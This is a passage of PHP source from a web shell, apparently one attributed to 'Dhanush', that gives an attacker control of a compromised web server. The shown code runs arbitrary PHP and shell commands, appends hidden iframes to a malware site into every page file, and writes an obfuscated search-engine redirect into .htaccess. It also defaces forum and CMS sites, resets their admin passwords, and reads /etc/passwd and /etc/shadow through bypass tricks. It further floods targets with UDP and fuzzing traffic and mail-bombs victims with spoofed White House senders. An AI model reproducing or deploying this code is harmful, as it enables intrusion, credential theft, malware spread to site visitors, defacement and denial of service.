2276 {
2277 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
2278 {
2279 $times = $_POST['times'];
2280 while($times--)
2281 {
2282 if(isset($_POST['padding']))
2283 {
2284 $fromPadd = rand(0,9999);
2285 $subjectPadd = " -- ID : ".rand(0,9999999);
2286 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
2287
2288 }
2289 $from = "president$fromPadd@whitehouse.gov";
2290 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
2291 {
2292 $error = 1;
2293 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
2294 break;
2295 }
2296 }
2297 if($error != 1)
2298 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
2299 }
2300 }
2301 else if($_POST['mailfunction'] == "massmailing")
2302 {
2303 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
2304 {
2305 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
2306 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
2307 else
2308 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
2309 }
2310 }
2311}
2312else if(isset($_POST['code']))
2313{
2314 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
2315 {
2316 // FIlter Some Chars we dont need
2317 ?><br>
2318 <textarea name="code" class="box" cols="120" rows="10"><?php
2319 $code = str_replace("<?php","",$_POST['code']);
2320 $code = str_replace("<?","",$code);
2321 $code = str_replace("?>","",$code);
2322
2323 // Evaluate PHP CoDE!
2324 htmlspecialchars(eval($code));
2325 ?>
2326 </textarea><?php
2327 }
2328 else if($_POST['code'] != null && $_POST['intext'] == "false")
2329 {
2330 $code = str_replace("<?php","",$_POST['code']);
2331 $code = str_replace("<?","",$code);
2332 $code = str_replace("?>","",$code);
2333
2334 // Evaluate PHP CoDE!
2335 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
2336 }
2337}
2338else if(isset($_GET['infect']))
2339{
2340 $coun = 0;
2341 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
2342 foreach (glob($_GET['path'] . "*.php") as $injectj00)
2343 {
2344 if($injectj00 == __FILE__)
2345 continue;
2346 if($myfile=fopen($injectj00,'a'))
2347 {
2348 fputs($myfile, $str);
2349 fclose($myfile);
2350 $coun = 1;
2351 }
2352 }
2353 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
2354 {
2355 if($myfile=fopen($injectj00,'a'))
2356 {
2357 fputs($myfile, $str);
2358 fclose($myfile);
2359 $coun = 1;
2360 }
2361 }
2362 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
2363 {
2364 if($myfile=fopen($injectj00,'a'))
2365 {
2366 fputs($myfile, $str);
2367 fclose($myfile);
2368 $coun = 1;
2369 }
2370 }
2371
2372
2373 if($coun == 1)
2374 echo "<center>Done !!!!<center>";
2375 else
2376 echo "<center>Cannot open files !!!!<center>";
2377}
2378else if(isset($_GET['redirect']))
2379{
2380 if($myfile = fopen(".htaccess",'a'))
2381 {
2382 $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
2383 fwrite($myfile, gzuncompress(base64_decode($mal)));
2384 fwrite($myfile, "\n\r");
2385 fclose($myfile);
2386 echo "<center>Done !!!!<center>";
2387 }
2388 else
2389 echo "<center>Cannot open file !!!!<center>";
2390}
2391else if(isset($_GET['malware']))
2392{ ?>
2393 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
2394 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
2395 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
2396 <div id="showmal"></div>
2397 <?php
2398}
2399else if(isset($_GET['codeinsert']))
2400{
2401 if($file1 = fopen(".htaccess",'r'))
2402 {
2403 ?><div id="showcode"></div>
2404 <form method=post>
2405 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
2406 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
2407 </form>
2408 <?php }
2409 else
2410 echo "<center>Cannot Open File!!</center>";
2411}
2412else if(isset($_POST['getcode']))
2413{
2414 if($myfile = fopen(".htaccess",'a'))
2415 {
2416 fwrite($myfile, $_POST['getcode']);
2417 fwrite($myfile, "\n\r");
2418 fclose($myfile);
2419 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
2420 }
2421 else
2422 echo "Permission Denied";
2423}
2424else if(isset($_GET['uploadurl']))
2425{
2426 $functiontype = trim($_GET['functiontype']);
2427 $wurl = trim($_GET['wurl']);
2428 $path = magicboom($_GET['path']);
2429
2430 function remotedownload($cmd,$url)
2431 {
2432 $namafile = basename($url);
2433 switch($cmd)
2434 {
2435 case 'wwget':
2436 execmd(which('wget')." ".$url." -O ".$namafile);
2437 break;
2438 case 'wlynx':
2439 execmd(which('lynx')." -source ".$url." > ".$namafile);
2440 break;
2441 case 'wfread' :
2442 execmd($wurl,$namafile);
2443 break;
2444 case 'wfetch' :
2445 execmd(which('fetch')." -o ".$namafile." -p ".$url);
2446 break;
2447 case 'wlinks' :
2448 execmd(which('links')." -source ".$url." > ".$namafile);
2449 break;
2450 case 'wget' :
2451 execmd(which('GET')." ".$url." > ".$namafile);
2452 break;
2453 case 'wcurl' :
2454 execmd(which('curl')." ".$url." -o ".$namafile);
2455 break;
2456 default:
2457 break;
2458 }
2459 return $namafile;
2460 }
2461 $namafile = remotedownload($functiontype,$wurl);
2462 $fullpath = $path . $directorysperator . $namafile;
2463 if(is_file($fullpath))
2464 {
2465 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
2466 }
2467 else
2468 echo "<center>Failed to upload $namafile</center>";
2469}
2470else if(isset($_GET['createfolder']))
2471{
2472 if(!mkdir($_GET['createfolder']))
2473 echo "Failed To create";
2474 else
2475 echo "<font class=txt>Folder Created Successfully</font>";
2476}
2477else if(isset($_GET['selfkill']))
2478{
2479 if(unlink(__FILE__))
2480 echo "<br><center><font size=5>Good Bye......</font></center>";
2481 else
2482 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
2483}
2484else if(isset($_GET['Create']))
2485{
2486 ?>
2487 <form method="post">
2488 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
2489 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
2490 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
2491 </form>
2492
2493<?php }
2494else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
2495{
2496 $content = $_POST['filecontent'];
2497 if($file_pointer = fopen($_POST['filecreator'], "w+"))
2498 {
2499 fwrite($file_pointer, $content);
2500 fclose($file_pointer);
2501 echo "<font class=txt>File Created Successfully</font>";
2502 }
2503 else
2504 echo "Cannot Create File";
2505}
2506else if(isset($_REQUEST["defaceforum"]))
2507{
2508 ?>
2509 <center><div id="showdeface"></div>
2510 <font color="#FF0000" size="4">Forum Index Changer</font>
2511 <form action="<?php echo $self; ?>" method = "POST">
2512 <input type="hidden" name="forum">
2513 <input type="hidden" name="defaceforum">
2514 <table border = "1" width="60%" style="text-align: center;border-color:#333333;" align="center">
2515 <tr>
2516 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
2517
2518 <td width="50%"><b> Database :</b> <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
2519 <tr><td height="50" width="50%"><b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> </td>
2520 <td><b> Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2521
2522 <tr><td height="50" width="50%">Type :
2523 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
2524 <option value="vb">vbulletin</option>
2525 <option value="mybb">Mybb</option>
2526 <option value="smf">SMF</option>
2527 <option value="ipb">IPB</option>
2528 <option value="wp">Wordpress</option>
2529 <option value="joomla">Joomla</option>
2530 </select></td>
2531 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
2532
2533 </tr>
2534 <tr>
2535 <td height="167" width="50%" colspan=2>
2536 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
2537
2538 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
2539 <label id="wordpres" style="display:none; float:right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="checked"> All</label></p>
2540 </div>
2541
2542 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
2543 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,all.value,f5.value)" class="but" value = "Hack It">
2544 </td>
2545 </tr>
2546 </table>
2547 </form>
2548 </center>
2549 <?php
2550 }
2551 else if(isset($_GET["passwordchange"]))
2552 {
2553 echo "<center>";
2554 ?>
2555 <div id="showchangepass"></div>
2556 <font color="#FF0000" size="4">Forum Password Changer</font>
2557 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value);return false;">
2558 <table border = "1" width="60%" height="246" style="text-align: center;border-color:#333333;" align="center">
2559 <tr>
2560 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> <b> DataBase :</b> <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> <b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> <b>Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2561 <tr>
2562 <td height="50" width="50%">Type :
2563 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
2564 <option value="vb">vbulletin</option>
2565 <option value="mybb">Mybb</option>
2566 <option value="smf">SMF</option>
2567 <option value="ipb">IPB</option>
2568 <option value="phpbb">PHPBB</option>
2569 <option value="wp">Wordpress</option>
2570 <option value="joomla">Joomla</option>
2571 </select></td>
2572 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
2573 </tr>
2574 <tr>
2575 <td colspan=2 height="100" width="780">
2576
2577 <p align="center"><div id="fid" style="display:block;"><b>User ID :</b> <input class="sbox" type="text" name="ipbuid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
2578
2579 <div id="joomla" style="display:none;"><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> <b>New Password :</b> <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
2580
2581 <div id="wpress" style="display:none;"><p><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"></div>
2582
2583 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
2584 </tr>
2585 </table>
2586 </form>
2587 </center>
2588 <?php
2589}
2590else if(isset($_GET['dosser']))
2591{
2592 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
2593 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
2594 {
2595 $IP=$_GET['ip'];
2596 $port=$_GET['port'];
2597 $executionTime = $_GET['exTime'];
2598 $no0fBytes = $_GET['no0fBytes'];
2599 $data = "";
2600 $timeout = $_GET['timeout'];
2601 $packets = 0;
2602 $counter = $no0fBytes;
2603 $maxTime = time() + $executionTime;;
2604 while($counter--)
2605 {
2606 $data .= "X";
2607 }
2608 $data .= " Dhanush";
2609
2610 while(1)
2611 {
2612 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
2613 if($socket)
2614 {
2615 fwrite($socket , $data);
2616 fclose($socket);
2617 $packets++;
2618 }
2619 if(time() >= $maxTime)
2620 {
2621 break;
2622 }
2623 }
2624 echo "Dos Completed!<br>";
2625 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
2626 echo "Total Number of Packets Sent : " . $packets . "<br />";
2627 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
2628 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
2629 }
2630}
2631else if(isset($_GET['fuzzer']))
2632{
2633 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
2634 {
2635 $IP=$_GET['ip'];
2636 $port=$_GET['port'];
2637 $times = $_GET['exTime'];
2638 $timeout = $_GET['timeout'];
2639 $send = 0;
2640 $ending = "";
2641 $multiplier = $_GET['multiplier'];
2642 $data = "";
2643 $mode="tcp";
2644 $data .= "GET /";
2645 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
2646 if($_GET['type'] == "tcp")
2647 {
2648 $mode = "tcp";
2649 }
2650
2651 while($multiplier--)
2652 {
2653 $data .= urlencode($_GET['no0fBytes']);
2654 }
2655 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
2656 $data .= "by-Dhanush".$ending;
2657 $length = strlen($data);
2658
2659
2660 echo "Sending Data :- <br /> <p align='center'>$data</p>";
2661
2662 for($i=0;$i<$times;$i++)
2663 {
2664 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
2665 if($socket)
2666 {
2667 fwrite($socket , $data , $length );
2668 fclose($socket);
2669 }
2670 }
2671 echo "Fuzzing Completed!<br>";
2672 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
2673 echo "Total Number of Packets Sent : " . $times . "<br />";
2674 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
2675 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
2676 }
2677}
2678else if(isset($_GET['bypassit']))
2679{
2680 if(isset($_GET['copy']))
2681 {
2682 if(@copy($_GET['copy'],"test1.php"))
2683 {
2684 $fh=fopen("test1.php",'r');
2685 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
2686 @fclose($fh);
2687 unlink("test1.php");
2688 }
2689 }
2690 else if(isset($_GET['imap']))
2691 {
2692 $string = $_GET['imap'];
2693 echo "<textarea cols=120 rows=20 class=box readonly>";
2694 $stream = imap_open($string, "", "");
2695 $str = imap_body($stream, 1);
2696 echo "</textarea>";
2697 }
2698 else if(isset($_GET['sql']))
2699 {
2700 echo "<textarea cols=120 rows=20 class=box readonly>";
2701 $file=$_GET['sql'];
2702
2703 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2704 $mysql_files = explode(':', $mysql_files_str);
2705
2706 $sql = array (
2707 "USE $mdb",
2708 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
2709 "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
2710 . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
2711 . "ESCAPED BY '' "
2712 . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
2713
2714 "SELECT a FROM $tbl LIMIT 1"
2715 );
2716 mysql_connect ($mhost, $muser, $mpass);
2717
2718 foreach ($sql as $statement) {
2719 $q = mysql_query ($statement);
2720
2721 if ($q == false) die (
2722 "FAILED: " . $statement . "\n" .
2723 "REASON: " . mysql_error () . "\n"
2724 );
2725
2726 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
2727
2728 echo htmlspecialchars($r[0]);
2729 mysql_free_result ($q);
2730 }
2731 echo "</textarea>";
2732 }
2733 else if(isset($_GET['curl']))
2734 {
2735 $ch=curl_init("file://" . $_GET[curl]);
2736 curl_setopt($ch,CURLOPT_HEADERS,0);
2737 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2738 $file_out=curl_exec($ch);
2739 curl_close($ch);
2740 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
2741 }
2742 else if(isset($_GET['include']))
2743 {
2744 if(file_exists($_GET['include']))
2745 {
2746 echo "<textarea cols=120 rows=20 class=box readonly>";
2747 @include($_GET['include']);
2748 echo "</textarea>";
2749 }
2750 else
2751 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
2752 }
2753 else if(isset($_GET['id']))
2754 {
2755 echo "<textarea cols=120 rows=20 class=box readonly>";
2756 for($uid=0;$uid<60000;$uid++)
2757 { //cat /etc/passwd
2758 $ara = posix_getpwuid($uid);
2759 if (!empty($ara))
2760 {
2761 while (list ($key, $val) = each($ara))
2762 {
2763 print "$val:";
2764 }
2765 print "\n";
2766 }
2767 }
2768 echo "</textarea>";
2769 break;
2770 }
2771 else if(isset($_GET['tempnam']))
2772 {
2773 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
2774 $fp = fopen ( $mytmp, 'r' );
2775 while(!feof($fp))
2776 echo fgets($fp);
2777 fclose ( $fp );
2778 }
2779 else if(isset($_GET['symlnk']))
2780 {
2781 echo "<textarea cols=120 rows=20 class=box readonly>";
2782 @mkdir("mydhanush",0777);
2783 @chdir("mydhanush");
2784 execmd("ln -s /etc/passwd");
2785
2786 echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/mydhanush/passwd");
2787 echo "</textarea>";
2788 }
2789 if(isset($_GET['newtype']))
2790 {
2791 $filename = $_GET['newtype'];
2792 echo "<textarea cols=120 rows=20 class=box readonly>";
2793 if($_GET['optiontype'] == "xxd")
2794 echo execmd("xxd ".$filename);
2795 else if($_GET['optiontype'] == "rev")
2796 echo execmd("rev ".$filename);
2797 if($_GET['optiontype'] == "tac")
2798 echo execmd("tac ".$filename);
2799 if($_GET['optiontype'] == "more")
2800 echo execmd("more ".$filename);
2801 if($_GET['optiontype'] == "less")
2802 echo execmd("less ".$filename);
2803 echo "</textarea>";
2804 }
2805}
2806// Deface Website
2807else if(isset($_GET['deface']))
2808{
2809 $myfile = fopen($_GET['deface'],'w');
2810 if(fwrite($myfile, base64_decode($ind)))
2811 {fclose($myfile);
2812 echo "Index Defaced Successfully";}
2813 else
2814 echo "Donot have write permission";
2815}
2816else if(isset($_GET['perms']))
2817{
2818?>
2819 <form>
2820 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
2821 <table align="center" border="1" style="width:40%;border-color:#333333;">
2822 <tr>
2823 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
2824 </tr>
2825 <tr>
2826 <td colspan="2" align="center" style="height:60px">
2827 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
2828 </tr>
2829 </table>
2830
2831 </form>
2832 <?php
2833}
2834else if(isset($_GET["chmode"]))
2835{
2836 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
2837 {
2838 $perms = 0;
2839 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
2840 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
2841 if(@chmod($_GET['myfilename'],$perms))
2842 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
2843 else
2844 echo "<center><blink>Cannot Change File Permissions</blink></center>";
2845 }
2846}
2847else if(isset($_GET['rename']))
2848{
2849?>
2850 <form>
2851 <table border="0" cellpadding="3" cellspacing="3">
2852 <tr>
2853 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
2854 </tr>
2855 <tr>
2856 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
2857 </tr>
2858 <tr>
2859 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/></td>
2860 </tr>
2861 </table>
2862 </form>
2863 <?php
2864
2865}
2866else if(isset($_GET['renamemyfile']))
2867{
2868 if(isset($_GET['to']) && isset($_GET['file']))
2869 {
2870 if(!rename($_GET['file'], $_GET['to']))
2871 echo "Cannot Rename File";
2872 else
2873 echo "<font class=txt>File Renamed Successfully</font>";
2874
2875 }
2876}
2877else if(isset($_GET['open']))
2878{
2879 if(is_file($_GET['myfilepath']))
2880 {
2881 $owner = "0/0";
2882 if($os == "Linux")
2883 $owner = getOGid($_GET['myfilepath']);
2884 ?>
2885 <form>
2886 <table style="width:57%;">
2887 <tr align="left">
2888 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
2889 </tr>
2890 <tr>
2891 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
2892 </tr>
2893 </table>
2894 <textarea name="content" rows="15" cols="100" class="box"><?php
2895 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
2896 if($content)
2897 {
2898 echo $content;
2899 }
2900 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
2901 {
2902 if(filesize($_GET['myfilepath']) != 0 )
2903 {
2904 fopen($_GET['myfilepath']);
2905 while(!feof())
2906 {
2907 echo htmlspecialchars(fgets($_GET['myfilepath']));
2908 }
2909 }
2910 }
2911
2912 ?>
2913 </textarea><br />
2914 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
2915 </form>
2916 <?php
2917 }
2918 else
2919 echo "File does not exist !!!!";
2920}
2921else if(isset($_POST['file']) && isset($_POST['content']))
2922{
2923 if(file_exists($_POST['file']))
2924 {
2925 $handle = fopen($_POST['file'],"w");
2926 if(fwrite($handle,$_POST['content']))
2927 echo "<font class=txt>File Saved Successfully!</font>";
2928 else
2929 echo "Cannot Write into File";
2930 }
2931 else
2932 {
2933 echo "File Name Specified does not exists!";
2934 }
2935}
2936else if(isset($_POST["SendNowToZoneH"]))
2937{
2938 $hacker = $_POST['defacer'];
2939 $method = $_POST['hackmode'];
2940 $neden = $_POST['reason'];
2941 $site = $_POST['domain'];
2942
2943 if (empty($hacker))
2944 {
2945 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
2946 }
2947 elseif($method == "--------SELECT--------")
2948 {
2949 die("<center><font size=3>[-] You Must Select The Method !</center>");
2950 }
2951 elseif($neden == "--------SELECT--------")
2952 {
2953 die("<center><font size=3>[-] You Must Select The Reason</center>");
2954 }
2955 elseif(empty($site))
2956 {
2957 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
2958 }
2959 // Zone-h Poster
2960 function ZoneH($url, $hacker, $hackmode,$reson, $site )
2961 {
2962 $k = curl_init();
2963 curl_setopt($k, CURLOPT_URL, $url);
2964 curl_setopt($k,CURLOPT_POST,true);
2965 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2966 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2967 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2968 $kubra = curl_exec($k);
2969 curl_close($k);
2970 return $kubra;
2971 }
2972
2973 $i = 0;
2974 $sites = explode("\n", $site);
2975 echo "<pre class=ml1 style='margin-top:5px'>";
2976 while($i < count($sites))
2977 {
2978 if(substr($sites[$i], 0, 4) != "http")
2979 {
2980 $sites[$i] = "http://".$sites[$i];
2981 }
2982 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2983 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
2984 ++$i;
2985 }
2986
2987 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2988}
2989else if(isset($_GET['executemycmd']))
2990{
2991 $comm = $_GET['executemycmd'];
2992 chdir($_GET['executepath']);
2993 echo shell_exec($comm);
2994}
2995// View Passwd file
2996else if(isset($_GET['passwd']))
2997{
2998 $test='';
2999 $tempp= tempnam($test, "cx");
3000 $get = "/etc/passwd";
3001 $name=@posix_getpwuid(@fileowner($get));
3002 $group=@posix_getgrgid(@filegroup($get));
3003 $owner = $name['name']. " / ". $group['name'];
3004 ?>
3005 <table style="width:57%;">
3006 <tr>
3007 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
3008 </tr>
3009 <tr>
3010 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3011 </tr>
3012 </table>
3013 <?php
3014 if(copy("compress.zlib://".$get, $tempp))
3015 {
3016 $fopenzo = fopen($tempp, "r");
3017 $freadz = fread($fopenzo, filesize($tempp));
3018 fclose($fopenzo);
3019 $source = htmlspecialchars($freadz);
3020 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
3021 unlink($tempp);
3022 }
3023 else
3024 {
3025 ?>
3026 <form>
3027 <input type="hidden" name="etcpasswd">
3028 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3029 <tr>
3030 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3031 </tr>
3032 <tr>
3033 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3034 </tr>
3035 <tr>
3036 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
3037 </tr>
3038 </table><br>
3039 </form>
3040 <?php
3041 }
3042}
3043else if(isset($_GET['shadow']))
3044{
3045 $test='';
3046 $tempp= tempnam($test, "cx");
3047 $get = "/etc/shadow";
3048 if(copy("compress.zlib://".$get, $tempp))
3049 {
3050 $fopenzo = fopen($tempp, "r");
3051 $freadz = fread($fopenzo, filesize($tempp));
3052 fclose($fopenzo);
3053 $source = htmlspecialchars($freadz);
3054 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3055 unlink($tempp);
3056 }
3057}
3058else if(isset($_GET['bomb']))
3059{
3060 ?><div id="showmail"></div>
3061 <form>
3062 <table id="margins" style="width:100%;">
3063 <tr>
3064 <td style="width:30%;">To</td>
3065 <td>
3066 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3067 </td>
3068 </tr>
3069 <tr>
3070 <td style="width:30%;">Subject</td>
3071 <td>
3072 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
3073 </td>
3074 </tr>
3075 <tr>
3076 <td style="width:30%;">No. of Times</td>
3077 <td>
3078 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3079 </td>
3080 </tr>
3081 <tr>
3082 <td style="width:30%;">Pad your message (Less spam detection)</td>
3083 <td><input type="checkbox" name="padding"/></td>
3084 </tr>
3085 <tr>
3086 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
3087 </tr>
3088 <tr>
3089 <td rowspan="2">
3090 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
3091 </td>
3092 </tr>
3093 </table>
3094 </form>
3095 <?php
3096}
3097
3098//Mass Mailer
3099else if(isset($_GET['mail']))
3100{
3101 ?><div id="showmail"></div>
3102 <div align="left">
3103 <form>
3104 <table align="left" style="width:100%;">
3105 <tr>
